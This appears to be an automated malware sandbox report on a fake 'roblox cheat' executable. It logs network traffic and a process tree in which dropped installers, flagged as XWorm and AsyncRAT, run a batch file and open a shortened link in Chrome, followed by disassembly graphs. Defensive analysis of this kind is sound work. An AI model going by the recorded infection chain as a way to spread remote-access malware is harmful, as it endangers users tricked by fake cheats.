                                                                                                MS-RequestId: 88c40095-b7f0-4b2a-9919-2d4ffea5e80d
                                                                                                MS-CV: A1mpsd3HlkCWGiIR.0
                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 24490


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                10 | 192.168.2.7 | 49737 | 184.28.90.27 | 443 | |
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:25 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-07-29 22:46:26 UTC | 467 | IN | HTTP/1.1 200 OK
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (chd/073B)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                Cache-Control: public, max-age=202600
                                                                                                Date: Mon, 29 Jul 2024 22:46:25 GMT
                                                                                                Connection: close
                                                                                                X-CID: 2


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                11 | 192.168.2.7 | 49742 | 184.28.90.27 | 443 | |
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:27 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Range: bytes=0-2147483646
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-07-29 22:46:27 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                ApiVersion: Distribute 1.1
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                Cache-Control: public, max-age=202641
                                                                                                Date: Mon, 29 Jul 2024 22:46:27 GMT
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                X-CID: 2
                                                                                                2024-07-29 22:46:27 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                12 | 192.168.2.7 | 49743 | 13.85.23.86 | 443 | |
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:47:03 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-07-29 22:47:04 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                MS-CorrelationId: eaacc733-736d-4732-8f5a-73d30ee6b591
                                                                                                MS-RequestId: d391bb12-61ce-4f44-9266-fbd030a04a7c
                                                                                                MS-CV: WR/4wcfe6EC0yfvk.0
                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Mon, 29 Jul 2024 22:47:03 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 30005


                                                                                                Target ID:0
                                                                                                Start time:18:46:05
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\roblox cheat.exe"
                                                                                                Imagebase:0x7a0000
                                                                                                File size:6'410'752 bytes
                                                                                                MD5 hash:6B94734FEAC8EDB9F925385163AD59C9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:18:46:05
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe"
                                                                                                Imagebase:0x810000
                                                                                                File size:5'720'984 bytes
                                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:18:46:06
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
                                                                                                Imagebase:0x7ff6c16b0000
                                                                                                File size:630'062 bytes
                                                                                                MD5 hash:FC411F4D9F4DBA5104CB1549153A8684
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:18:46:07
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
                                                                                                Imagebase:0x7ff741f30000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:18:46:07
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff75da10000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:18:46:16
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd
                                                                                                Imagebase:0x7ff741f30000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:16
                                                                                                Start time:18:46:16
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff75da10000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:18
                                                                                                Start time:18:46:17
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                                Imagebase:0x7ff6c4390000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:20
                                                                                                Start time:18:46:17
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                Imagebase:0x7ff6c4390000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:21%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:3.7%
                                                                                                  Total number of Nodes:485
                                                                                                  Total number of Limit Nodes:7

                                                                                                  Callgraph


                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 254 b2d0f8-b2d108 255 b2d137-b2d13b 254->255 256 b2d10a-b2d11b GetPEB 254->256 257 b2d12e-b2d135 256->257 258 b2d11d-b2d121 call b2cb8d 256->258 257->255 260 b2d126-b2d129 258->260 260->257 261 b2d12b-b2d12d 260->261 261->257
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab57a412ecfaf76c50045dacf294404439d98aaa4740bf0a0d07b7cf031cd47b
                                                                                                  • Instruction ID: 31295c00978da693f4a8354fb33df6d5a4351890e36ac6e31bfbd58454ee4f3b
                                                                                                  • Opcode Fuzzy Hash: ab57a412ecfaf76c50045dacf294404439d98aaa4740bf0a0d07b7cf031cd47b
                                                                                                  • Instruction Fuzzy Hash: A0F06532611334EBCB26CB5CD509A99B3FDEB49B61F114096F505EB590C6B0DD00C7D0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 0 b2c9ff-b2ca0b 1 b2ca9d-b2caa0 0->1 2 b2ca10-b2ca21 1->2 3 b2caa6 1->3 5 b2ca23-b2ca26 2->5 6 b2ca2e-b2ca47 LoadLibraryExW 2->6 4 b2caa8-b2caac 3->4 7 b2cac6-b2cac8 5->7 8 b2ca2c 5->8 9 b2ca49-b2ca52 GetLastError 6->9 10 b2caad-b2cabd 6->10 7->4 12 b2ca9a 8->12 13 b2ca54-b2ca66 call b13142 9->13 14 b2ca8b-b2ca98 9->14 10->7 11 b2cabf-b2cac0 FreeLibrary 10->11 11->7 12->1 13->14 17 b2ca68-b2ca7a call b13142 13->17 14->12 17->14 20 b2ca7c-b2ca89 LoadLibraryExW 17->20 20->10 20->14
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,38E2E45B,?,00B2CB0C,?,?,?,00000000), ref: 00B2CAC0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: d7a8443095af15553a0119e237c3c3d71f89ec1c2afdfff78c862de573352fb9
                                                                                                  • Instruction ID: eeff6c8ca2483f2329264d2f079bb159ee625590470341c7237f2196ce6d7288
                                                                                                  • Opcode Fuzzy Hash: d7a8443095af15553a0119e237c3c3d71f89ec1c2afdfff78c862de573352fb9
                                                                                                  • Instruction Fuzzy Hash: E421BB71A01235ABC721DB64FC41A9E3FE8DB477A1F2446A4E919B7294DB30EE41C7E0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 21 b144f4-b14501 call b2a316 24 b14541-b14544 ExitThread 21->24 25 b14503-b1450b 21->25 25->24 26 b1450d-b14511 25->26 27 b14513 call b2d03e 26->27 28 b14518-b1451e 26->28 27->28 30 b14520-b14522 28->30 31 b1452b-b14531 28->31 30->31 32 b14524-b14525 CloseHandle 30->32 31->24 33 b14533-b14535 31->33 32->31 33->24 34 b14537-b1453b FreeLibraryAndExitThread 33->34 34->24
                                                                                                  APIs
                                                                                                    • Part of subcall function 00B2A316: GetLastError.KERNEL32(00000000,?,00B0E677,00B2B9ED,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2A31A
                                                                                                    • Part of subcall function 00B2A316: SetLastError.KERNEL32(00000000), ref: 00B2A3BC
                                                                                                  • CloseHandle.KERNEL32(?,?,?,00B1462B,?,?,00B1449D,00000000), ref: 00B14525
                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00B1462B,?,?,00B1449D,00000000), ref: 00B1453B
                                                                                                  • ExitThread.KERNEL32 ref: 00B14544
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 1991824761-0
                                                                                                  • Opcode ID: 61473d4df6a1d785b48d3e717edaf0a333d62991fed183132212eceef20549e9
                                                                                                  • Instruction ID: 5fa927e248280169bd604251c7f5535df998c47881baae60b7086e44e2f3f0a6
                                                                                                  • Opcode Fuzzy Hash: 61473d4df6a1d785b48d3e717edaf0a333d62991fed183132212eceef20549e9
                                                                                                  • Instruction Fuzzy Hash: F0F0FE30500710ABDB215B65CC0DA9A3ADAEF15361B984A90B865E75A0DF30DD82C791

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,00B24375,00B1466F,00B1466F,?,00000002,38E2E45B,00B1466F,00000002), ref: 00B2438C
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00B24375,00B1466F,00B1466F,?,00000002,38E2E45B,00B1466F,00000002), ref: 00B24393
                                                                                                  • ExitProcess.KERNEL32 ref: 00B243A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 0457bbe2d631ca25ae79982a67bfbbfc3b4e1805802a7071016436da191108fa
                                                                                                  • Instruction ID: c4cd84c632e01f7ea9309e270c8ca74cb8058dd4125b19f66def20c406526326
                                                                                                  • Opcode Fuzzy Hash: 0457bbe2d631ca25ae79982a67bfbbfc3b4e1805802a7071016436da191108fa
                                                                                                  • Instruction Fuzzy Hash: D1D09E31000714ABCF416FA0EC0EA993F65EF44342B1441A0B90D6B532CF7299929B84

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 42 b2caca-b2caf2 43 b2caf4-b2caf6 42->43 44 b2caf8-b2cafa 42->44 47 b2cb49-b2cb4c 43->47 45 b2cb00-b2cb07 call b2c9ff 44->45 46 b2cafc-b2cafe 44->46 49 b2cb0c-b2cb10 45->49 46->47 50 b2cb12-b2cb20 GetProcAddress 49->50 51 b2cb2f-b2cb46 49->51 50->51 52 b2cb22-b2cb2d call b2381c 50->52 53 b2cb48 51->53 52->53 53->47
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 0-2721712938
                                                                                                  • Opcode ID: 0394f0e54f33fbc8129c310b43932e9e9d653d61de9067beb572ae916f89d1a3
                                                                                                  • Instruction ID: f5d3153398026b8936bf601bdab3ee094078fb118c3c8d2c74ad299cfa5080ec
                                                                                                  • Opcode Fuzzy Hash: 0394f0e54f33fbc8129c310b43932e9e9d653d61de9067beb572ae916f89d1a3
                                                                                                  • Instruction Fuzzy Hash: CC01F5336046359BDB269F6DFC49A5E3BDAEB893603244161F908DB15CDA31C801D791

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00C3C1C8,0000000C), ref: 00B14452
                                                                                                  • ExitThread.KERNEL32 ref: 00B14459
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611280651-0
                                                                                                  • Opcode ID: eb3b6bbc5a4889c2d3b723345e2699807264e6f8bb44b212122d252302c76951
                                                                                                  • Instruction ID: d6977efd527a4ac8ae054feb428d35ac5e6302b978163eb0224c49ff0937f351
                                                                                                  • Opcode Fuzzy Hash: eb3b6bbc5a4889c2d3b723345e2699807264e6f8bb44b212122d252302c76951
                                                                                                  • Instruction Fuzzy Hash: BFF0C271900711AFDB01BFB0D85AB6E3BB4EF45711F2045C8F015AB2A2CF305941CBA1

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 75 b2a4b0-b2a4b9 76 b2a4bb-b2a4ce RtlFreeHeap 75->76 77 b2a4e8-b2a4e9 75->77 76->77 78 b2a4d0-b2a4e7 GetLastError call b0e5d5 call b0e672 76->78 78->77
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4C6
                                                                                                  • GetLastError.KERNEL32(?,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: ed8796b6b8b811556b22073a875dba6405b7e92134aaa1dd4f8388c53f62e00e
                                                                                                  • Instruction ID: ea787a7c4d93188201bb8a45ef0e8ba30040ccc2b70c8b3775a2ec2e8878a60d
                                                                                                  • Opcode Fuzzy Hash: ed8796b6b8b811556b22073a875dba6405b7e92134aaa1dd4f8388c53f62e00e
                                                                                                  • Instruction Fuzzy Hash: E8E08C32100614ABCF213BA0FC0DB893FA8EF54792F1484A1F61CA61B0DE71CA428BA0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00B14464,00C3C1C8,0000000C), ref: 00B2A1C9
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00B2A26B
                                                                                                    • Part of subcall function 00B2B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2B9DC
                                                                                                    • Part of subcall function 00B2A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4C6
                                                                                                    • Part of subcall function 00B2A4B0: GetLastError.KERNEL32(?,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$Heap$AllocateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 2037364846-0
                                                                                                  • Opcode ID: 3a55d70ad5479078cf478c31921f326c0f5a5db3e6a2a635e5279d75873532aa
                                                                                                  • Instruction ID: bc51789bd875b183b1da464acc1ef3f5468b269cca91ec4e5591bda13a2056e6
                                                                                                  • Opcode Fuzzy Hash: 3a55d70ad5479078cf478c31921f326c0f5a5db3e6a2a635e5279d75873532aa
                                                                                                  • Instruction Fuzzy Hash: 6431E871A45632ABD6113774BC86F3E2AD8DB41BB9B1002F0F51DA21E1DEA58D0982A3

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 152 b2b99b-b2b9a6 153 b2b9b4-b2b9ba 152->153 154 b2b9a8-b2b9b2 152->154 156 b2b9d3-b2b9e4 RtlAllocateHeap 153->156 157 b2b9bc-b2b9bd 153->157 154->153 155 b2b9e8-b2b9f3 call b0e672 154->155 162 b2b9f5-b2b9f7 155->162 158 b2b9e6 156->158 159 b2b9bf-b2b9c6 call b29cb0 156->159 157->156 158->162 159->155 165 b2b9c8-b2b9d1 call b325ed 159->165 165->155 165->156
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2B9DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c1f545a2cb348c1211eeec35a5ec2c5214950ce9fd89a08d150f20b84063dc3e
                                                                                                  • Instruction ID: 2932e0999320895b7f0c786c24f53534e0cf462c7d76c35e4e86cfecb1476683
                                                                                                  • Opcode Fuzzy Hash: c1f545a2cb348c1211eeec35a5ec2c5214950ce9fd89a08d150f20b84063dc3e
                                                                                                  • Instruction Fuzzy Hash: 0FF0BE312052316B9B326B62BC42F5A3BC8EF517B1B148093EA1CE6194CF20EC8186A0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 168 b2a4ea-b2a4f6 169 b2a528-b2a533 call b0e672 168->169 170 b2a4f8-b2a4fa 168->170 178 b2a535-b2a537 169->178 171 b2a513-b2a524 RtlAllocateHeap 170->171 172 b2a4fc-b2a4fd 170->172 174 b2a526 171->174 175 b2a4ff-b2a506 call b29cb0 171->175 172->171 174->178 175->169 180 b2a508-b2a511 call b325ed 175->180 180->169 180->171
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00B1463C,00B2A27F,?,00B23C3D,00C3C588,00000018,00000003), ref: 00B2A51C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 480e0bb913040398a08ebdc059501383921171a2c2f1c61975754216d6925ca7
                                                                                                  • Instruction ID: e58e185c6552acf6ae42ee59ee239ad21d612be2aa4f3f721dcdb9037ca03879
                                                                                                  • Opcode Fuzzy Hash: 480e0bb913040398a08ebdc059501383921171a2c2f1c61975754216d6925ca7
                                                                                                  • Instruction Fuzzy Hash: 47E0ED312012315BEA3127A5BC20B6B3ACCEF613B1F1101E0AD5CA20E0DE64CD0182A3

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 183 b27a3b-b27a69 call b03198 call b27793 187 b27a6e-b27a73 call b03175 183->187
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
